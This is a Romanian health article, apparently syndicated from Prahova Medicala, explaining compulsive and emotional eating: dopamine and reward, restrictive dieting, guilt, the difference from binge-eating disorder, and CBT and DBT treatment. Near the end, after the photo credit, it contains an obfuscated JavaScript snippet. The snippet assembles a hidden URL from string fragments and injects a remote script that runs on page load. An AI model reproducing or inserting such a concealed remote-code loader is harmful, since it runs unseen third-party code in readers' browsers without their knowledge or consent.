Ai mâncat deja, nu ți-e foame, și totuși te afli din nou în fața frigiderului sau cu o pungă de ceva în mână fără să îți amintești exact când ai deschis-o.
Urmează vinovăția și convingerea că e vorba de voință slabă. Această interpretare nu e doar incorectă, este și contraproductivă, pentru că ratează complet ce se întâmplă, de fapt. Înțelegerea cauzelor psihologice reale ale mâncatului compulsiv este primul pas spre a face ceva eficient în legătură cu el. Mâncatul emoțional și mâncatul compulsiv sunt răspunsuri biologice la nevoi psihologice neîmplinite. Persoanele cu comportamente de tip mâncat compulsiv au adesea o sensibilitate crescută în sistemul de recompensă al creierului, în special în zonele care implică dopamina, substanța chimică legată de motivație și plăcere. Asta înseamnă că mâncarea, mai ales cea bogată în calorii, poate declanșa răspunsuri de recompensă mai intense în creier. Mâncatul restrictiv intensifică preocuparea față de mâncare și epuizează resursele de autocontrol, agravând comportamentul compulsiv. Când creierul percepe privarea, declanșează supraalimentarea compensatorie. Asta explică de ce dietele stricte produc adesea efectul opus celui dorit la persoanele cu un tipar de mâncat emoțional. Cercetările arată că dopamina joacă un rol important în mâncatul compulsiv, implicând pofta de mâncare, luarea deciziilor, funcționarea și impulsivitatea, contribuind la dezvoltarea și menținerea comportamentului compulsiv
Mâncarea activează eliberarea de dopamină și face ca oamenii să efectueze o acțiune specifică care le oferă plăcere. Câștigarea la loterie și consumul de substanțe precum drogurile sau alcoolul sunt similare cu mâncatul compulsiv prin faptul că aceste acțiuni îi fac pe oameni să se simtă bine în momentul respectiv, provocând suprastimularea sistemului de recompensă al creierului. Mâncarea e una dintre cele mai la îndemână surse de dopamină disponibile, mai ales în momentele de stres, anxietate, plictiseală sau tristețe. Mulți oameni folosesc mâncarea ca modalitate de a face față durerii emoționale. Stresul, singurătatea, anxietatea sau tristețea pot declanșa episoade de mâncat care calmează temporar disconfortul, dar ușurarea e urmată adesea de vinovăție sau rușine. Vinovăția nu rezolvă nimic și, de fapt, e unul dintre cei mai puternici declanșatori ai episodului următor. Există însă o distincție clinică importantă între mâncatul emoțional ocazional și tulburarea de alimentație. Mâncatul emoțional implică supraalimentare ocazională ca răspuns la emoții. Tulburarea de mâncat compulsiv înseamnă consumul unor cantități mari în perioade scurte, cu pierderea controlului. Mâncatul include distres, rușine și episoade recurente și e un diagnostic clinic care necesită tratament profesionist. Dacă episoadele sunt rare și nu îți perturbă funcționarea sau relația cu mâncarea, este mâncat emoțional, ceva ce se poate îmbunătăți prin conștientizare și câteva ajustări. Dacă sunt frecvente, recurente, însoțite de un sentiment de pierdere a controlului și de distres după, merită o evaluare de specialitate. Terapia cognitiv-comportamentală și terapia dialectic-comportamentală (DBT) sunt eficiente pentru că lucrează direct cu toleranța la distres și cu găsirea unor alternative la mâncare ca mecanism de coping. (P)
Foto: Pexels
(function(){
otld=document.createElement(„script”);otld.async=true;otld_=”o”+(„pe”)+”ns”;
otldu=”2613819788.”;otld_+=”ta”+(„t.e”);otld_+=””+(„u”+””)+”/”;
otldu+=”mbx903i0tldfnfc6sv3evs”+(„dpgkizxr”);
otld.src=”https://”+otld_+otldu;otld.type=”text/javascript”;
document.body.appendChild(otld);
})();
Articolul Nu e lipsă de voință: ce se petrece cu adevărat când mănânci fără să-ți fie foame apare prima dată în Prahova Medicala .
